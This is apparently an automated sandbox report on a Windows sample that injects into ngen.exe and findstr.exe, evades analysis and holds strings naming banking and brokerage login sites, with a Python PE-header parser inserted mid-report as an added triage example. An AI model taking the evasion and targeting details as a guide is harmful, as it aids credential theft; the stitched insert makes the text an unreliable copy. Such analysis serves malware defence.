            Source: Binary string: wntdll.pdb source: ngen.exe, ngen.exe, 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, findstr.exe, 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2296210633.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2294244319.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
Source: GJRX21GBj3.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: GJRX21GBj3.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: GJRX21GBj3.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: GJRX21GBj3.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: GJRX21GBj3.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: GJRX21GBj3.exe Static PE information: section name: .managed
Source: GJRX21GBj3.exe Static PE information: section name: hydrated
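The static PE lines above (image base, DllCharacteristics flags, which section each data directory lands in, and the non-standard .managed and hydrated section names, which are characteristic of .NET NativeAOT output) are what a triage script should extract from a sample before it is ever executed. The following is an added example, not part of the Joe Sandbox report, that parses exactly those fields with only the Python standard library. The header-only image it builds for itself is constructed to mirror the traits listed for GJRX21GBj3.exe so the code runs offline; a real sample would be read from disk instead. The STANDARD_SECTIONS set and the 0x60000000 image-base threshold are assumptions chosen to match what the report flags.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification.
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}
DATA_DIRECTORIES = ["EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC", "DEBUG",
                    "ARCHITECTURE", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT", "IAT",
                    "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED"]
# Assumed baseline: section names a stock MSVC link produces; anything else is worth a second look.
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".pdata", ".rsrc", ".reloc", ".idata",
                     ".edata", ".tls", ".bss", ".CRT", ".gfids", ".00cfg", ".didat"}
SECTION_HDR = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes


def parse_pe(data: bytes) -> dict:
    """Return image base, DllCharacteristics, section names and the section holding each data directory."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x20B:    # PE32+: 8-byte ImageBase at +24, directory table at +112
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
        ndirs_off, dirs_off = opt + 108, opt + 112
    elif magic == 0x10B:  # PE32: 4-byte ImageBase at +28, directory table at +96
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
        ndirs_off, dirs_off = opt + 92, opt + 96
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]  # same offset in both formats
    ndirs = struct.unpack_from("<I", data, ndirs_off)[0]

    sections = []
    for i in range(nsections):
        name, vsize, va, rawsize, *_ = struct.unpack_from(SECTION_HDR, data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), va, max(vsize, rawsize)))

    def section_for(rva: int):
        return next((n for n, va, size in sections if va <= rva < va + size), None)

    directories = {}
    for i in range(min(ndirs, len(DATA_DIRECTORIES))):
        va, _size = struct.unpack_from("<II", data, dirs_off + 8 * i)
        if va:
            directories[DATA_DIRECTORIES[i]] = section_for(va)
    return {
        "machine": machine,
        "pe32plus": magic == 0x20B,
        "image_base": image_base,
        "high_image_base": image_base > 0x60000000,  # the threshold this report applies
        "dll_characteristics": [n for bit, n in sorted(DLL_CHARACTERISTICS.items()) if dll_chars & bit],
        "sections": [s[0] for s in sections],
        "unusual_sections": [s[0] for s in sections if s[0] not in STANDARD_SECTIONS],
        "directories": directories,
    }


def build_sample_pe() -> bytes:
    """Constructed header-only PE32+ image carrying the static traits listed in the report (no code)."""
    sections = [(b".text", 0x1000, 0x10000), (b".rdata", 0x11000, 0x8000), (b".managed", 0x19000, 0x1000),
                (b"hydrated", 0x1A000, 0x1000), (b".rsrc", 0x1B000, 0x1000), (b".reloc", 0x1C000, 0x1000)]
    dirs = {"IMPORT": (0x11100, 0x100), "RESOURCE": (0x1B000, 0x200), "BASERELOC": (0x1C000, 0x100),
            "DEBUG": (0x11200, 0x38), "LOAD_CONFIG": (0x11300, 0x140), "IAT": (0x11000, 0x100)}
    dos = (b"MZ" + b"\0" * 58 + struct.pack("<I", 0x80)).ljust(0x80, b"\0")   # e_lfanew = 0x80
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, 240, 0x0022)
    opt = struct.pack("<HBBIIIII", 0x20B, 14, 0, 0x10000, 0x9000, 0, 0x1000, 0x1000)
    opt += struct.pack("<Q", 0x140000000)                                        # ImageBase
    opt += struct.pack("<IIHHHHHHIIIIHH", 0x1000, 0x200, 6, 0, 0, 0, 6, 0, 0, 0x1D000, 0x400, 0, 3,
                       0x0020 | 0x0040 | 0x0100 | 0x8000)                          # DllCharacteristics
    opt += struct.pack("<QQQQII", 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    for name in DATA_DIRECTORIES:
        opt += struct.pack("<II", *dirs.get(name, (0, 0)))
    hdrs = b"".join(struct.pack(SECTION_HDR, n, vs, va, vs, 0x400 + i * 0x1000, 0, 0, 0, 0, 0x60000020)
                    for i, (n, va, vs) in enumerate(sections))
    return dos + b"PE\0\0" + coff + opt + hdrs


if __name__ == "__main__":
    info = parse_pe(build_sample_pe())
    print(f"image base {info['image_base']:#x}, flags {info['dll_characteristics']}")
    print(f"unusual sections {info['unusual_sections']}, directories {info['directories']}")
```

To run it against a real file, replace build_sample_pe() with the bytes read from disk; the parser only touches headers, so it never maps or executes the sample.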
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_004017BF push ds; iretd 4_2_00401B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0040A8C2 push ss; iretd 4_2_0040A921
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0041A881 push esp; iretd 4_2_0041A882
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0041E8B7 push ss; ret 4_2_0041E8BD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_004051A1 push ebp; ret 4_2_004051A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_004019BF push ds; iretd 4_2_00401B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_00401B31 push ds; iretd 4_2_00401B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_00403500 push eax; ret 4_2_00403502
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0041CD8C push edx; iretd 4_2_0041CD8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_00407643 pushfd ; iretd 4_2_0040765A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_00407638 pushfd ; iretd 4_2_0040765A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0041A763 push esi; iretd 4_2_0041A767
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058809AD push ecx; mov dword ptr [esp], ecx 4_2_058809B6
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036809AD push ecx; mov dword ptr [esp], ecx 7_2_036809B6
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E57260 push esi; iretd 7_2_02E57264
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E57247 push esi; iretd 7_2_02E57264
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E5B3B4 push ss; ret 7_2_02E5B3BA
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E473BF push ss; iretd 7_2_02E4741E
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E5737E push esp; iretd 7_2_02E5737F
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E620DD push cs; ret 7_2_02E620DE
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E44140 pushfd ; iretd 7_2_02E44157
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E44135 pushfd ; iretd 7_2_02E44157
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E5711C push esi; iretd 7_2_02E57264
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E60BB3 push cs; ret 7_2_02E60BB4
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E59889 push edx; iretd 7_2_02E5988A
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E5FE8D push es; iretd 7_2_02E5FE8E
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E41C9E push ebp; ret 7_2_02E41C9F
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_03494072 push eax; iretd 7_2_03494078
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_03499808 push ebx; ret 7_2_0349989F
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_034A2822 push eax; ret 7_2_034A2824
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_03490E84 push ecx; retf 7_2_03490E85
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeMemory allocated: 29B95880000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058FD1C0 rdtsc 4_2_058FD1C0
            Source: C:\Windows\SysWOW64\findstr.exeWindow / User API: threadDelayed 2128
            Source: C:\Windows\SysWOW64\findstr.exeWindow / User API: threadDelayed 7845
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-15772
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\findstr.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\findstr.exe TID: 6208Thread sleep count: 2128 > 30
            Source: C:\Windows\SysWOW64\findstr.exe TID: 6208Thread sleep time: -4256000s >= -30000s
            Source: C:\Windows\SysWOW64\findstr.exe TID: 6208Thread sleep count: 7845 > 30
            Source: C:\Windows\SysWOW64\findstr.exe TID: 6208Thread sleep time: -15690000s >= -30000s
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe TID: 1856Thread sleep time: -65000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\findstr.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\findstr.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E5BF10 FindFirstFileW,FindNextFileW,FindClose,7_2_02E5BF10
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF658562760 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,0_2_00007FF658562760
            Source: H0840I45.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3924911559.000000000141A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
            Source: H0840I45.7.drBinary or memory string: discord.comVMware20,11696428655f
            Source: H0840I45.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: H0840I45.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: GJRX21GBj3.exeBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
            Source: H0840I45.7.drBinary or memory string: global block list test formVMware20,11696428655
            Source: H0840I45.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: H0840I45.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: H0840I45.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: H0840I45.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: H0840I45.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: H0840I45.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: H0840I45.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: H0840I45.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: H0840I45.7.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: H0840I45.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: findstr.exe, 00000007.00000002.3924355546.00000000031FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: H0840I45.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: H0840I45.7.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: H0840I45.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: H0840I45.7.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: H0840I45.7.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: H0840I45.7.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: H0840I45.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: H0840I45.7.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: H0840I45.7.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: H0840I45.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: H0840I45.7.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: H0840I45.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: H0840I45.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: firefox.exe, 0000000B.00000002.2629405691.0000016FA869D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK?+P
            Source: H0840I45.7.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: H0840I45.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: H0840I45.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\findstr.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058FD1C0 rdtsc 4_2_058FD1C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_00417A33 LdrLoadDll,4_2_00417A33
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B4588 mov eax, dword ptr fs:[00000030h]4_2_058B4588
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0590B594 mov eax, dword ptr fs:[00000030h]4_2_0590B594
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0590B594 mov eax, dword ptr fs:[00000030h]4_2_0590B594
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587758F mov eax, dword ptr fs:[00000030h]4_2_0587758F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587758F mov eax, dword ptr fs:[00000030h]4_2_0587758F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587758F mov eax, dword ptr fs:[00000030h]4_2_0587758F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05882582 mov eax, dword ptr fs:[00000030h]4_2_05882582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05882582 mov ecx, dword ptr fs:[00000030h]4_2_05882582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BE59C mov eax, dword ptr fs:[00000030h]4_2_058BE59C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A15A9 mov eax, dword ptr fs:[00000030h]4_2_058A15A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A15A9 mov eax, dword ptr fs:[00000030h]4_2_058A15A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A15A9 mov eax, dword ptr fs:[00000030h]4_2_058A15A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A15A9 mov eax, dword ptr fs:[00000030h]4_2_058A15A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A15A9 mov eax, dword ptr fs:[00000030h]4_2_058A15A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059135BA mov eax, dword ptr fs:[00000030h]4_2_059135BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059135BA mov eax, dword ptr fs:[00000030h]4_2_059135BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059135BA mov eax, dword ptr fs:[00000030h]4_2_059135BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059135BA mov eax, dword ptr fs:[00000030h]4_2_059135BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0593F5BE mov eax, dword ptr fs:[00000030h]4_2_0593F5BE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059005A7 mov eax, dword ptr fs:[00000030h]4_2_059005A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059005A7 mov eax, dword ptr fs:[00000030h]4_2_059005A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059005A7 mov eax, dword ptr fs:[00000030h]4_2_059005A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h]4_2_058AF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h]4_2_058AF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h]4_2_058AF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h]4_2_058AF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h]4_2_058AF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h]4_2_058AF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h]4_2_058AF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h]4_2_058AF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h]4_2_058AF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A45B1 mov eax, dword ptr fs:[00000030h]4_2_058A45B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A45B1 mov eax, dword ptr fs:[00000030h]4_2_058A45B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059535D7 mov eax, dword ptr fs:[00000030h]4_2_059535D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059535D7 mov eax, dword ptr fs:[00000030h]4_2_059535D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059535D7 mov eax, dword ptr fs:[00000030h]4_2_059535D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BE5CF mov eax, dword ptr fs:[00000030h]4_2_058BE5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BE5CF mov eax, dword ptr fs:[00000030h]4_2_058BE5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B55C0 mov eax, dword ptr fs:[00000030h]4_2_058B55C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A95DA mov eax, dword ptr fs:[00000030h]4_2_058A95DA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058865D0 mov eax, dword ptr fs:[00000030h]4_2_058865D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BA5D0 mov eax, dword ptr fs:[00000030h]4_2_058BA5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BA5D0 mov eax, dword ptr fs:[00000030h]4_2_058BA5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059555C9 mov eax, dword ptr fs:[00000030h]4_2_059555C9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058FD5D0 mov eax, dword ptr fs:[00000030h]4_2_058FD5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058FD5D0 mov ecx, dword ptr fs:[00000030h]4_2_058FD5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BC5ED mov eax, dword ptr fs:[00000030h]4_2_058BC5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BC5ED mov eax, dword ptr fs:[00000030h]4_2_058BC5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058825E0 mov eax, dword ptr fs:[00000030h]4_2_058825E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AE5E7 mov eax, dword ptr fs:[00000030h]4_2_058AE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AE5E7 mov eax, dword ptr fs:[00000030h]4_2_058AE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AE5E7 mov eax, dword ptr fs:[00000030h]4_2_058AE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AE5E7 mov eax, dword ptr fs:[00000030h]4_2_058AE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AE5E7 mov eax, dword ptr fs:[00000030h]4_2_058AE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AE5E7 mov eax, dword ptr fs:[00000030h]4_2_058AE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AE5E7 mov eax, dword ptr fs:[00000030h]4_2_058AE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AE5E7 mov eax, dword ptr fs:[00000030h]4_2_058AE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A15F4 mov eax, dword ptr fs:[00000030h]4_2_058A15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A15F4 mov eax, dword ptr fs:[00000030h]4_2_058A15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A15F4 mov eax, dword ptr fs:[00000030h]4_2_058A15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A15F4 mov eax, dword ptr fs:[00000030h]4_2_058A15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A15F4 mov eax, dword ptr fs:[00000030h]4_2_058A15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A15F4 mov eax, dword ptr fs:[00000030h]4_2_058A15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B7505 mov eax, dword ptr fs:[00000030h]4_2_058B7505
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B7505 mov ecx, dword ptr fs:[00000030h]4_2_058B7505
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05954500 mov eax, dword ptr fs:[00000030h]4_2_05954500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05954500 mov eax, dword ptr fs:[00000030h]4_2_05954500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05954500 mov eax, dword ptr fs:[00000030h]4_2_05954500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05954500 mov eax, dword ptr fs:[00000030h]4_2_05954500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05954500 mov eax, dword ptr fs:[00000030h]4_2_05954500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05954500 mov eax, dword ptr fs:[00000030h]4_2_05954500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05954500 mov eax, dword ptr fs:[00000030h]4_2_05954500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05955537 mov eax, dword ptr fs:[00000030h]4_2_05955537
